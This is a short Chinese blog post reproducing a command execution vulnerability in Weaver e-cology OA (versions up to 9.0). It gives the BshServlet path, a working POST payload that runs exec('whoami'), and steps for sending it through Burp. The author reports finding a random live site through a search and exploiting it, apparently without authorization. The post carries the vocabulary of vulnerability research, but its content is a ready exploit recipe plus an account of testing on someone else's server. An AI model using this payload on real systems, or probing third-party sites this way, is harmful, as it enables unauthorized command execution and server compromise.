最近圈子也是被泛微OA命令执行刷爆了。周一上班划水ing,想着来复现一下,顺便更新下博客。运气好随便搜索了一个就存在漏洞
0x01漏洞描述
泛微OA办公系统是一款协调办公软件。
泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。
0x02漏洞危害
攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。
0x03影响范围
泛微 e-cology<=9.0
0x04漏洞复现
漏洞路径: /weaver/bsh.servlet.BshServlet
poc:bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
访问该站域名加上漏洞路径如果存在,就有漏洞
访问后显示这样,点击按钮提交,神器burp抓包。将post内容替换先前的poc
bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
发送
成功复现